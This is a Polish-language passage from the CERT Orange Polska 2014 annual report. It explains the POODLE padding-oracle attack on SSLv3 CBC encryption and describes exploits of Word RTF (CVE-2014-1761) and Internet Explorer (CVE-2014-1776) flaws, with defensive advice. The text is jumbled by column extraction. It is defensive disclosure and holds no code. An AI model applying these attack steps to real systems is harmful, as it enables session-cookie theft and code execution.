Wykres 25. Szczegóły ataku z powodu niezgodności MAC. Po przechwyceniu trans- Szyfrowanie CBC Aby zrozumieć dokładnie, w jaki sposób przeprowadzany misji zamiast ostatniego bloku autorzy ataku wstawiają tekst jawny tekst jawny tekst jawny jest atak, należy prześledzić dokładnie, jak wygląda proces inny, wybrany przez siebie blok szyfrogramu. W tej sytuacji szyfrowania i deszyfrowania. strona odbierająca odszyfruje podsunięty blok szyfrogra- wektor inicjujący Przyjmijmy, że protokół posługuje się blokami o długości mu i podda operacji XOR z poprzednim blokiem. W wyniku 8 bajtów. By zaszyfrować wybrane dane, strona nadająca tego powstanie wartość, która zostanie zinterpretowana wyznacza wartość funkcji MAC na danych poddawanych jako uzupełnienie. Jej ostatni bajt będzie zawierał długość klucz klucz klucz szyfrowaniu, dołącza ją na końcu i dodaje uzupełnienie – uzupełnienia i jednocześnie zdecyduje o wartości sumy szyfrowanie szyfrowanie szyfrowanie MAC. w ten sposób powstaje tekst jawny. Następnie tekst jaw- Jeśli w naszym przykładzie ostatni bajt będzie miał war- ny dzielony jest na bloki o równej długości. Pierwszy blok tość 7, suma MAC będzie poprawna i tekst zostanie przy- jest poddawany działaniu operacji XOR z tzw. wektorem jęty przez stronę odbierającą. W tym przypadku będziemy inicjującym, a następnie szyfrowany ustalonym kluczem. mogli stwierdzić, że ostatni bajt tekstu jawnego odpowia- Wynik o długości 8 bajtów to pierwszy blok szyfrogramu. dającego wybranemu blokowi szyfrogramu „XORowany” szyfrogram szyfrogram szyfrogram Drugi blok tekstu jawnego jest poddawany działaniu ope- z ostatnim bajtem poprzedniego bloku szyfru (znanym) racji XOR z otrzymanym w poprzednim kroku pierwszym daje wynik 7. Wystarczy znowu „XORować” ją z 7, aby blokiem szyfrogramu, a następnie szyfrowany ustalonym poznać wartość ostatniego bajtu tekstu jawnego wybra- kluczem, i tak aż do ostatniego bloku. nego bloku. Jeśli strona odbierająca odrzuci tekst, atakują- Wykres 26. >> Wykres 25. cy może zmienić ostatni bajt poprzedniego bloku i wysłać szyfrogram szyfrogram szyfrogram Deszyfrowanie CBC szyfrogram jeszcze raz. Aby odszyfrować dane, strona odbierająca używa funkcji deszyfrującej z ustalonym kluczem na pierwszym 8-bajto- Prawdopodobieństwo, że atakowany bajt tekstu jawnego wym bloku, a następnie poddaje XOR otrzymaną wartość ma wartość 7, jest równe 1/256, co oznacza, że średnio z wektorem inicjalizującym. Później odszyfrowuje kolejny raz na 128 prób bajt zostanie zaakceptowany. 8-bajtowy blok tekstu jawnego i poddaje XOR z poprzed- Następnie, mając kontrolę nad częścią tekstu jawnego (np. klucz klucz klucz nim blokiem szyfrogramu. Czynności te są powtarzane na deszyfrowanie deszyfrowanie deszyfrowanie ścieżki żądania), możemy manipulować długością tego kolejnych blokach szyfrogramu – aż do ostatniego. Uzupeł- fragmentu. Pozycja atakowanego fragmentu (np. ciastecz- wektor nienie jest odrzucane, a wartość MAC jest porównywana inicjujący ka) będzie się zmieniała tak, by jego kolejne bajty stawały z pozostałą częścią tekstu jawnego. Ten krok okazał się się ostatnimi bajtami któregoś bloku tekstu jawnego. Cia- kluczowy dla przeprowadzania ataku. steczko o długości 10 bajtów można będzie wtedy odzy- >> Wykres 26. skać średnio po 1280 zapytaniach.

tekst jawny tekst jawny tekst jawny Uzupełnienie jest bowiem odrzucane niezależnie od jego CERT Orange Polska radzi: zawartości. Jeśli mamy wpływ na zawartość tekstu jawne- Przeprowadzenie opisywanego ataku można uniemożliwić, go, możemy doprowadzić do sytuacji, w której cały ostatni jeżeli wyłączy się wsparcie dla protokołu SSLv3 (np. dla blok będzie uzupełnieniem, czyli – w naszym przykładzie – przeglądarki internet Explorer można to zrobić w „Panelu będzie wypełniony siedmioma bajtami oraz ósmym bajtem Sterowania”, wybierając „Opcje internetowe”, a następnie o wartości 7. Tak więc czynnikiem, który zdecyduje, czy w zakładce „Zaawansowane” odznaczyć „Użyj SSL 3.0”). strona odbierająca (w atakach tego typu nazywana rów- Jeśli z jakiegoś powodu nie da się tego zrobić, liczbę moż- nież wyrocznią) na pytanie, czy tekst jawny jest poprawny, liwych do przeprowadzenia na podstawie Poodle ataków udzieli odpowiedzi twierdzącej, będzie to, czy ostatni bajt uda się ograniczyć, wyłączywszy w przeglądarce obsługę ostatniego bloku tekstu jawnego ma wartość 7. Jeśli war- JavaScript. Dla administratorów, których serwery wspiera- tość ta jest inna, położenie wartości MAC zostanie odczy- ją SSLv3, najlepszym wyjściem jest wyłączenie lub zablo- tane błędnie, a co za tym idzie, tekst zostanie odrzucony kowanie tego protokołu.

72 73 Raport CERT Orange Polska za rok 2014

Rysunek 56. Zawartość złośliwego pliku RTF 11.7 Załącznik 7. Inne interesujące podatności

Luka CVE-2014-1761 to uszkodzenie pamięci w procesie Luka zaczęła być stosowana w atakach przeciwko użyt- programu Word. Została ona odkryta przez pracowników kownikom systemu Windows. Jej pierwsze wykorzystanie Google Security Team i ujawniona 24 marca 2014 roku. zostało zarejestrowane 2 kwietnia. Zaobserwowano m.in. Odnaleziono funkcjonujące w sieci exploity, które opierają próby zainstalowania trojana Cueisfry oraz Havex w kam- się na tej ciekawej podatności. paniach APT (Advanced Persistent Threat), czyli ukierunko- wanych działaniach wywiadowczych. Luka wykorzystuje błąd oprogramowania Microsoft Word Luka CVE-2014-1776 to uszkodzenie pamięci w przeglą- w interpretacji dokumentu RTF. Dokument RTF opisuje, darce Internet Explorer ujawnione 26 kwietnia 2014 roku. w jaki sposób czytnik dokumentów powinien wyświetlać Badacze, którzy ją odkryli i koordynowali jej łatanie z fir- jego zawartość. Robi to między innymi za pomocą słów mą Microsoft, twierdzili, że była to część trwającej właśnie kontrolnych (nazywanych również tagami) takich jak: kampanii ataków nazwanej później Operation Clandestine \comment, \datafield, \date. Słowa kontrolne powinny Fox. być stosowane zgodnie z opublikowanym przez Micro- Gdy użytkownik wchodzi na złośliwą stronę WWW, pobie- soft standardem. Jednak nie da się wymusić na autorach ra i otwiera specjalnie przygotowany plik Flash. Aktywna dokumentów przestrzegania tego standardu i każdy czyt- zawartość znajdująca się w pliku przeprowadza proces nik powinien weryfikować zgodność ich treści ze standar- heap spraying, czyli przygotowuje pamięć procesu prze- dem, zanim przystąpi do jej przetwarzania. glądarki do przeprowadzenia włamania, umieszczając Rysunek 57. w niej dane, które w trakcie włamania zostaną zinterpreto- Fragment kodu ActionScript W przypadku luki CVE-2014-1761 źródłem błędu okazało wane jako kod. Następnie kod JavaScript umieszczony na przeprowadzający heap spraying się słowo kontrolne \overridetable i słowa z nim związa- stronie deszyfruje swoją kolejną część i w efekcie dopro- ne. Standard określa, że słowo to powinno mieć parametr wadza do powstania błędu typu use-after-free. Exploit o wartości 0, 1 lub 9, natomiast w złośliwym dokumencie przygotowuje shellcode ROP i zmienia wskaźnik stosu tak, RTF umieszczony został parametr o wartości 25. Czytnik by na niego wskazywał. Po całkowitym przejęciu sterowa- Microsoft Word nie sprawdza poprawności tego parame- nia kodem w wątku przeglądarki przystępuje do pobierania tru, tylko przystępuje do dalszego przetwarzania zawarto- składników malware z sieci internet. ści, w wyniku czego powstają kolejne błędy. Jednym z nich >> Rysunek 57. jest błędna interpretacja typu obiektu. Dzięki temu atakują- cy uzyskuje kontrolę nad elementami obiektu, do których Według informacji opublikowanych na stronie Microsoft nie powinien mieć dostępu. Dodatkowo, odpowiednio for- podatna jest przeglądarka Internet Explorer w wersjach mułując zawartość dokumentu, może zmusić czytnik do 6-11 (czyli praktycznie wszystkie obecnie używane), jed- wywołania metody obiektu, który został zmodyfikowany, nak atakujący wybierali na cele głównie wersje 9-11. i tym samym przejąć kontrolę nad sterowaniem wykonania kodu w wątku. CERT Orange Polska radzi: >> Rysunek 56. Aby zabezpieczyć się przed exploitami atakującymi ele- Zaznaczono wykorzystywane słowo kluczowe menty systemu Windows, warto korzystać z zestawu oraz fragment shellcode. EMET20 zawierającego narzędzia znacznie ograniczające- go możliwości przejęcia kontroli nad wykonaniem kodu. Autor exploitu wykorzystuje fakt, że biblioteka mscomctl. Skuteczność zestawu została potwierdzona m.in. w trak- dll nie wspiera mechanizmu ASLR19 oraz że znana jest mu cie testowania omawianego ataku. Nie zapominajmy oczy- dokładnie struktura pamięci w obszarze, w którym jest ona wiście o regularnym aktualizowaniu przeglądarki interne- załadowana. Dzięki temu może skonstruować shellcode towej. ROP, ominąć resztę funkcjonujących w systemie zabezpie- czeń i ostatecznie wykonać swój kod.

19 Address Space Layout Randomization – funkcjonalność systemu operacyjnego przydzielająca kluczowym elementom aplikacji losowe miejsca w pamięci 20 74 Tamże 75 Raport CERT Orange Polska za rok 2014

notatki

77 Raport CERT Orange Polska za rok 2014

notatki

78 za rok 2014 Raport CERT Orange Polska za rok

Więcej informacji znajdziesz na www.cert.orange.pl